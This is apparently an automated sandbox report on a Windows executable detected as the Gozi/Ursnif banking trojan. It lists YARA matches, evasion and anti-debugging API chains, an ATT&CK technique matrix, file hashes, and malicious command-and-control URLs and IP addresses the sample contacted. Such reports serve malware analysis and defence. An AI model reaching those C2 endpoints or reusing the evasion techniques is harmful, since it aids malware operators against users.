      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR, Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00412E5E 0_2_00412E5E
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004129C9 0_2_004129C9
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004135CE 0_2_004135CE
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004131FC 0_2_004131FC
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004139B6 0_2_004139B6
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_0040110B GetProcAddress,NtCreateSection,memset, 0_2_0040110B
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00401459 NtMapViewOfSection, 0_2_00401459
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004019F1 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019F1
Source: KOYCdGz80D.exe, Virustotal: Detection: 52%
Source: KOYCdGz80D.exe, ReversingLabs: Detection: 48%
Source: KOYCdGz80D.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_008256A5 CreateToolhelp32Snapshot,Module32First, 0_2_008256A5
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: classification engine, Classification label: mal100.troj.evad.winEXE@1/0@1/2
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      barindex
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Unpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Unpacked PE file: 0.2.KOYCdGz80D.exe.400000.0.unpack
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00418A30 pushfd ; retf 0042h 0_2_00418A31
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00827AAD push 8B8751D0h; retf 0_2_00827AB2
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_0082D8D3 push ds; ret 0_2_0082D8E1
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_0082CE7A push ebp; ret 0_2_0082CE7F
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_0082D558 push ds; ret 0_2_0082D559
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
Source: Yara match, File source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep graph_0-4895
Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712, Thread sleep count: 90 > 30
Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712, Thread sleep count: 58 > 30
Source: C:\Users\user\Desktop\KOYCdGz80D.exe TID: 5712, Thread sleep count: 59 > 30
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, API call chain: ExitProcess graph end node graph_0-4888
Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000882000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWto4 Adapter
Source: KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000882000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW

      Anti Debugging

      barindex
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_0-4895
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00824F82 push dword ptr fs:[00000030h] 0_2_00824F82
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00401000 LoadLibraryA,GetProcAddress, 0_2_00401000
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019F1
      Source: C:\Users\user\Desktop\KOYCdGz80D.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C7F
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 0_2_004118DB
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: __crtGetLocaleInfoA_stat, 0_2_004154FA
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA, 0_2_0041089B
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_00401D68
Source: C:\Users\user\Desktop\KOYCdGz80D.exe, Code function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_004015B0

      Stealing of Sensitive Information

      barindex
Source: Yara match, File source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR

      Remote Access Functionality

      barindex
Source: Yara match, File source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: KOYCdGz80D.exe PID: 5348, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception11
      Virtualization/Sandbox Evasion
      1
      Input Capture
      1
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts11
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information
      LSASS Memory11
      Security Software Discovery
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing
      Security Account Manager11
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Remote System Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials114
      System Information Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
Source | Detection | Scanner | Label
KOYCdGz80D.exe | 52% | Virustotal |
KOYCdGz80D.exe | 49% | ReversingLabs | Win32.Trojan.Generic
KOYCdGz80D.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
0.2.KOYCdGz80D.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
0.2.KOYCdGz80D.exe.640000.2.unpack | 100% | Avira | HEUR/AGEN.1245293
No Antivirus matches
Source | Detection | Scanner | Label
http://94.103.183.153/ws | 100% | Avira URL Cloud | malware
http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi | 100% | Avira URL Cloud | malware
http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk | 100% | Avira URL Cloud | malware
http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/ | 100% | Avira URL Cloud | malware
http://94.103.183.153/ | 100% | Avira URL Cloud | malware
http://62.173.142.51/ | 100% | Avira URL Cloud | malware
http://94.103 | 0% | Avira URL Cloud | safe
http://62.173.142.51/ | 2% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
checklist.skype.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/IU0adVtArkJ_2/BZSxJ28e/Tc5ERYxiq7NBJmMEOo_2FLz/U3IE7OaYn6/s6_2BEZEnVZDoNKzr/yGWuv6V_2Fey/ibIrbuFvdzu/G5cNIxcFhMXXH4/DW8BYhEM_2Bfx1WgbZGW2/9wbrpFGQVXKMRqQD/zmPaF1BbhLFtoKq/CFytgFZSMFNAbTktuc/B_2FQe4sV/W6Pv_2BAatm_2Ft2VjTv/WRtPQxXM/lSCDVEp9/l.jlk | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://62.173.142.51/drew/nxxSRbXkG/Z9AQFeMulxsZ78vPJ0Ba/xgGOAFgVNpjYUN1Ulcb/8uwIiaMwLO1graJYCm8PkM/ | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://checklist.skype.com/drew/3PKTGV3tNzaVLTkq/t_2Fk5P4Y6K9Qzr/6RM6HLfcw_2BRzYyd_/2FngDszCZ/8roslt | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://62.173.142.51/ | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000878000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | 2%, Virustotal; Avira URL Cloud: malware | unknown
http://94.103.183.153/ws | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://94.103.183.153/drew/ZPHuUA_2/FprSm4ZnZ_2BAzE0dNANwbe/iluX9tql3G/HloTTZMt_2B0yd_2F/E7gfm_2FdCi | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp, KOYCdGz80D.exe, 00000000.00000002.509156874.0000000000809000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://checklist.skype.com/6WkbUYRz/dPSG7YZOtAhk9jZCO3f | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://94.103.183.153/ | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://94.103 | KOYCdGz80D.exe, 00000000.00000002.509470240.000000000229C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://checklist.skype.com/drew/3PKTGV3tS | KOYCdGz80D.exe, 00000000.00000002.509334762.0000000000833000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
62.173.142.51 | unknown | Russian Federation | 34300 | SPACENET-ASInternetServiceProviderRU | true
94.103.183.153 | unknown | Russian Federation | 197390 | RATELE-ASRU | false
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:826246
              Start date and time:2023-03-14 14:58:14 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:KOYCdGz80D.exe
              Original Sample Name:d09f787a952a6e946656ac9184768fbe.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@1/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 5.2% (good quality ratio 5.2%)
              • Quality average: 89%
              • Quality standard deviation: 15.4%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 15
              • Number of non-executed functions: 7
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): fs.microsoft.com
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
Match | Associated Sample Name / URL | Detection | Threat Name
62.173.142.51 | server.exe | malicious | Ursnif, CryptOne
 | server.exe | malicious | Ursnif
 | server.exe | malicious | Ursnif
 | server.exe | malicious | Ursnif
94.103.183.153 | server.exe | malicious | Ursnif, CryptOne
 | server.exe | malicious | Ursnif
 | server.exe | malicious | Ursnif
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SPACENET-ASInternetServiceProviderRU | server.exe | malicious | Ursnif, CryptOne | 62.173.142.51
 | server.exe | malicious | Ursnif | 62.173.142.51
 | server.exe | malicious | Ursnif | 62.173.142.51
 | server.exe | malicious | Ursnif | 62.173.142.51
 | server.exe | malicious | Ursnif | 62.173.140.236
 | server.exe | malicious | Ursnif | 62.173.140.236
 | server.exe | malicious | Ursnif | 62.173.140.236
 | server.exe | malicious | Ursnif | 62.173.141.36
 | server.exe | malicious | Ursnif | 62.173.141.36
 | lQj2udnlAj.exe | malicious | Ursnif | 62.173.141.36
 | server.exe | malicious | Ursnif | 62.173.141.36
 | server.exe | malicious | Ursnif | 62.173.138.6
 | server.exe | malicious | Ursnif | 62.173.138.6
 | server.exe | malicious | Ursnif | 62.173.138.6
 | server.exe | malicious | Ursnif | 62.173.140.103
 | server.exe | malicious | Ursnif | 62.173.140.103
 | server.exe | malicious | Ursnif | 62.173.140.103
 | server.exe | malicious | Ursnif | 62.173.140.103
 | server.exe | malicious | Ursnif | 62.173.140.103
 | server.exe | malicious | Ursnif | 62.173.140.103
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.825405817982751
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:KOYCdGz80D.exe
                            File size:240128
                            MD5:d09f787a952a6e946656ac9184768fbe
                            SHA1:c3c3cbad8d40c7ba332c2b6d7ae0464d092c0877
                            SHA256:8cd071a056f555c793b95c82f9eff1fcf60e304a1e9589988e9819f27a754256
                            SHA512:d99dbae675932c18280103de4553777aaebe051a6da11a651a665a34c5bdf3aef2b97f1ab8195d652572b6a7e9ae9547fc583b9e666c1ee9715561f3fd2af345
                            SSDEEP:3072:T1rxrNcNq2GawilCy9y1UKk4BauPffL1xrN2fKdGJh0RxW2NM6BoaM6:LNyqAwgCQmouPnL1xN2kQ2NMioa
                            TLSH:00348E1272D0A871E7324631BE2BD3B5661EFCA18F5D6AEB23846A2F4D711E1CE71341
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........aBL...L...L...#...\...#.../...E...G...L...:...#...a...#...M...#...M...RichL...........PE..L...;c5b...........................
                            Icon Hash:9a82024281828a84
                            Entrypoint:0x409761
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6235633B [Sat Mar 19 04:59:39 2022 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
